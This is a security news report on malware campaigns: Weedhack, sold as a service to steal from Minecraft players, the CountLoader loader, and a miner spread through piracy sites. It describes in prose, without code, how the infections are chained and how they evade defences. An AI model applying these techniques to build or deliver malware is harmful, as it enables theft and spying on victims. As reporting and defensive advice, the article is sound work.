Weedhack uses YouTube to infect Minecraft; CountLoader hits 86K

McAfee Labs identified a malware-as-a-service called Weedhack that has targeted Minecraft players since January 2026. The campaign used YouTube search results and videos to drive downloads from more than 240 malicious URLs and hosted about 3,820 unique JAR files designed to install further payloads.

McAfee researcher Aayush Tyagi noted, “This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs,” and investigators found two YouTube channels and multiple videos redirecting viewers to the harmful downloads.

The infection chain typically begins when a user runs a JAR file such as DonutDupe.jar. That file uses a technique known as EtherHiding to read a command-and-control address stored on the Ethereum blockchain. DonutDupe.jar then downloads a second payload, Elevator.jar, which gathers system details, configures Microsoft Defender exclusions and drops two more modules. SecurityManager.jar establishes persistence and stages Component.jar, which provides remote-access and command capabilities. Operators host an online dashboard at weedhack[.]to where customers can view stolen credentials, craft payloads and monitor infected systems.

Weedhack can target Minecraft versions 1.21.0 through 1.21.11 and can inject into legitimate mods and launchers. The service is offered in a free tier that includes an infostealer able to capture Minecraft session IDs, screenshots and files; harvest cookies, saved passwords and data from 36 browsers, 56 browser wallets and 12 desktop wallet apps; and collect credentials for platforms such as Discord, Steam and Telegram. A premium tier, priced from $4.99 per month or $24.99 for a lifetime license, adds remote functions including webcam access, keylogging, reverse shells, screen and input control, and file transfer. The operators promote the product and provide updates and support through a Telegram channel with more than 850 members.

McAfee reported the majority of Weedhack infections in the United States, followed by Germany, India, the U.K., Italy, Vietnam, Canada, Norway, Sweden, Finland and Spain. Investigators observed cases in which customers used remote features to record victims via webcams and share videos in the Telegram group.

Separately, McAfee disclosed that CountLoader, an obfuscated JavaScript loader distributed through sites offering cracked software, has compromised roughly 86,000 unique machines. The infection starts when a user runs an EXE that launches a PowerShell command to download and execute the CountLoader script via mshta.exe. CountLoader establishes persistence, contacts its C2 servers and attempts to spread via USB drives; McAfee estimated about 9,000 infections resulted from removable media.

CountLoader operators have used the loader to deploy multiple payloads, including Cobalt Strike, PureHVNC RAT, Amatera Stealer and mining or clipping tools. The most recent deployments included a cryptocurrency clipper that hijacks clipboard contents to redirect transactions.

Kaspersky researchers described a related long-running campaign that used illegal movie and TV streaming sites to push a fake video-player update that installs a cryptocurrency miner. The attack delivered a ZIP archive containing a legitimate installer executable and a malicious DLL. The DLL was loaded by a side-loading technique to run a fork of SilentCryptoMiner, which disabled protections, repeatedly requested elevation until successful, ran watchdog components to keep itself active and launched XMRig-based CPU and GPU miners. In some instances the campaign also deployed a remote-access agent capable of running commands and dropping additional components.

Researchers recommended avoiding unofficial Minecraft clients and mods from unverified sites, being careful with search results and YouTube links that promise cracked or enhanced game files, keeping security software up to date, restricting permissions for unknown downloads and steering clear of pirated software and media sites where loaders and miner campaigns commonly spread.